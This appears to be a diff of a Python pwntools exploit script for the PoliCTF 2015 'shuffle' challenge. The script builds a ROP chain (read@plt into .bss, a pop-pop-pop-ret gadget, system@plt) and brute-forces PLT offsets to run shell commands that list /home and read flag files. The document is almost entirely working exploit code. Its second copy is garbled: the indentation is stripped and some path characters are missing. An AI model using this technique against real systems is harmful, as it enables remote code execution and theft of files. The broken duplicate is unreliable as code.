stephenR · July 12, 2015 10:34
diff --git a/shuffle.py b/shuffle.py
 #!/usr/bin/env python

 import pwn
 import struct

 def p(d):
    return struct.pack('<I', d)

 host = 'shuffle.polictf.it'
 port = 80

 def try_offsets(i, j, cmd):
    s = pwn.remote(host, port, timeout=1)

    s.readline()

    plt_start = 0x8048690
    read_plt = plt_start + (0x10 * i)
    system_plt = plt_start + (0x10 * j)
    poppoppopret = 0x0804901d
    bss = 0x0804b140
    buf = 'A'*32
    buf += p(read_plt)
    buf += p(poppoppopret)
    buf += p(0)
    buf += p(bss)
    buf += p(len(cmd))
    buf += p(system_plt)
    buf += 'A'*4
    buf += p(bss)

    s.sendline(buf)
    s.sendline('exit')
    s.readuntil('It all began as a mistake..\n')
    s.send(cmd)
    print s.clean_and_log()

 pwn.context.log_level = 'error'

 for i in range(25):
    for j in range(25):
        if i == j:
            continue
        print 'i {}, j {}'.format(i, j)
        try:
            try_offsets(i, j, '''echo -e test\\x3123123; ls -l /home/; ls -l /home/*; cat /home/*/fl*\x00''')
        except EOFError:
            print 'eof'
	#!/usr/bin/env python

	import pwn
	import struct

	def p(d):
	return struct.pack('<I', d)

	host = 'shuffle.polictf.it'
	port = 80

	def try_offsets(i, j, cmd):
	s = pwn.remote(host, port, timeout=1)

	s.readline()

	plt_start = 0x8048690
	read_plt = plt_start + (0x10 * i)
	system_plt = plt_start + (0x10 * j)
	poppoppopret = 0x0804901d
	bss = 0x0804b140
	buf = 'A'*32
	buf += p(read_plt)
	buf += p(poppoppopret)
	buf += p(0)
	buf += p(bss)
	buf += p(len(cmd))
	buf += p(system_plt)
	buf += 'A'*4
	buf += p(bss)

	s.sendline(buf)
	s.sendline('exit')
	s.readuntil('It all began as a mistake..\n')
	s.send(cmd)
	print s.clean_and_log()

	pwn.context.log_level = 'error'

	for i in range(25):
	for j in range(25):
	if i == j:
	continue
	print 'i {}, j {}'.format(i, j)
	try:
	try_offsets(i, j, '''echo -e test\\x3123123; ls -l /home/; ls -l /home/; cat /home//fl*\x00''')
	except EOFError:
	print 'eof'